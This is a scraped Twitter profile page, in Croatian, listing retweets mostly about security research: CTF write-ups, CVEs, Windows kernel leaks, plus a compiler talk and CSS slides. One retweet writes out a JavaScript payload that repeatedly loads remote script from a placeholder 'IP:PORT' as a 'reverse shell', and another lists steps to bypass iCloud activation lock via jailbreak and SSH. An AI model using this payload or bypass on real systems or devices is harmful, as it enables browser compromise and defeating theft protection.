dangdang

@777bareman777

Vrijeme pridruživanja: rujan 2019.

Tweetovi

Blokirali ste korisnika/cu @777bareman777

Jeste li sigurni da želite vidjeti te tweetove? Time nećete deblokirati korisnika/cu @777bareman777

  1. proslijedio/la je Tweet
    10. pro 2019.

    A remote JS reverse shell payload by <script>setInterval(function(){d=document;z=d.createElement("script");z.src="//IP:PORT";d.body.appendChild(z)},0)</script>

    Poništi
  2. proslijedio/la je Tweet
    27. stu 2019.

    New video about the suidbash challenge from the Google CTF Finals 2019. It's about an actual zero-day in /bin/bash - CVE-2019-18276 🔴

    Prikaži ovu nit
    Poništi
  3. proslijedio/la je Tweet
    17. stu 2019.

    Another great talk by of MSRC showing exploitation of UAF from win 7 to win 10 RS5; reviewing new mitigations and how they were bypassed.

    Poništi
  4. proslijedio/la je Tweet
    13. stu 2019.

    Android PAC vuln discovered by researcher with potential for remote code execution. CVE-2019-2205 Patched as part of bulletin 2019-11-01

    Poništi
  5. proslijedio/la je Tweet
    14. stu 2019.

    Optimizations in C++ Compilers: A practical journey - Matt Godbolt There's a tradeoff to be made in giving the compiler more information: it can make slower. Technologies such as link time optimization can give you the best of both worlds.

    Poništi
  6. proslijedio/la je Tweet
    11. stu 2019.

    How to bypass iCloud using (Thanks to and for this) Step 1. Boot into DFU Mode Step 2. Jailbreak using checkra1n Step 3. Install usbmuxd via brew Step 4. iproxy 2222 44 Step 5. New Terminal Window Step 6. ssh root@localhost -p 2222

    Prikaži ovu nit
    Poništi
  7. proslijedio/la je Tweet
    13. stu 2019.

    Another win32k pointer leak, this time it's more fun :) Enjoy:

    Poništi
  8. proslijedio/la je Tweet
    9. pro 2018.

    A writeup for HITCON's Super Hexagon challenge (part1). A detailed look into AArch64 custom kernel exploitation.

    Poništi
  9. proslijedio/la je Tweet
    10. stu 2019.

    Just wrote a short blog post about a win32k info leak I found earlier this year:

    Prikaži ovu nit
    Poništi
  10. proslijedio/la je Tweet
    30. ruj 2019.

    CSS display 속성을 다시 배워야 할 판입니다. 시간이 아주 많은 분들만 보세요. 영문 슬라이드 111장. "Does it work? Using the new CSS Layout"

    Prikaži ovu nit
    Poništi

Čini se da učitavanje traje već neko vrijeme.

Twitter je možda preopterećen ili ima kratkotrajnih poteškoća u radu. Pokušajte ponovno ili potražite dodatne informacije u odjeljku Status Twittera.

    Možda bi vam se svidjelo i ovo:

    ·